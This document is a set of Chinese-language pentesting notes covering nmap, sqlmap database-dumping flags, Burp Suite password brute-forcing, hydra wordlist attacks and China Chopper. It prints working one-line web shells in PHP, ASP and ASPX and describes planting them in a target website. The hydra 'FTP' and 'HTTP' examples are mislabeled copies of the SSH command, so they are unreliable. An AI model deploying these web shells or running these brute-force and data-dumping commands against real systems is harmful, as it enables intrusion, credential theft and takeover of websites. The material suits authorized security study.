1 nmap
主要功能:
(1)
主机发现
(2)
端口扫描
(3)
版本侦测
(4)
操作系统侦测
nmap的常用参数:
-A :选项用于使用进攻性方式扫描
-T4: 指定扫描过程使用的时序,总有6个级别(0-5),级别越高,扫描速度越 快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4
-oX test.xml: 将扫描结果生成 test.xml 文件
-oG test.txt: 将扫描结果生成 test.txt 文件
-sn : 只进行主机发现,不进行端口扫描
-O : 指定Nmap进行系统版本扫描
-sV: 指定让Nmap进行服务版本扫描
-p : 扫描指定的端口
-sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的 方式来对目标主机进行扫描
-sU: 指定使用UDP扫描方式确定目标主机的UDP端口状况
-script
扫描单个主机大域名或IP地址:
2 sqlmap
sqlmap参数:
-p 指定测试参数
-b 获取banner
–dbs 列举数据库
–is-dba 是否是管理员权限
–current-db 当前数据库
–current-user 当前用户
–tables 列举数据库的表名
–count 检索所有条目数
–columns 获取表的列名
–dump 获取表中的数据,包含列
–dump-all 转存DBMS数据库所有表项目
–level 测试等级(1-5),默认为1
-v 显示详细信息
实例:查看指定数据库,表,列,内容等:
–dbs 列举数据库
–current-db 当前数据库
–tables 列举数据库的表名
–columns 获取表的列名
–dump 获取表中的数据,包含列
3 burpsuite
proxy代理模块
今天我们当场爆破了一个四位数密码:
配置好代理,然后抓包具体看前面,抓到包就发送到intrude然后依次步骤:
Attack-type攻击类型为一处爆破点,因此payload set有效载荷为1,有效载荷类型为数字。然后从0000开始因为不知道密码是几位数,每次位一个步骤:
当扫完的时候你会发现密码的长度或是一些内容会和其他的又很明显的区别,所以一般情况就是那个:
4 hydra
hydra参数:
-R:继续从上一次进度接着破解
-S:大写,采用SSL链接
-s :小写,可通过这个参数指定非默认端口
-l :指定破解的用户,对特定用户破解
-L :指定用户名字典
-p :小写,指定密码破解,少用,一般是采用密码字典
-P :大写,指定密码字典
-e :可选,n:空密码试探,s:使用指定用户和密码试探
-C :使用冒号分割格式,例如“登录名:密码”来
代替 -L/-P 参数
-M :指定目标列表文件一行一条
-o :指定结果输出文件
-f :在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t :同时运行的线程数,默认为16
-w
破解ssh
hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh
-L指定用户字典 -P 指定密码字典 -o把成功的输出到ssh.txt文件 -vV显示详细信息
破解FTP:
hydra -L user.txt -P passwd.txt -o ftp.txt -vV -t 5 target_IP ssh
-L指定用户名列表
-P指定密码字典
-o把爆破的输出到文件
-t指定线程
-vV 显示详细信息
破解HTTP:
hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh
-L指定用户字典
-P 指定密码字典
-o把成功的输出到ssh.txt文件
-vV显示详细信息
6 中国菜刀:
基本操作:
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
简单的一句话木马:
PHP:
<?php @eval($_POST['pass']);?>
Asp:
<%eval request (“pass”)%>
Aspx:
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
还不理解!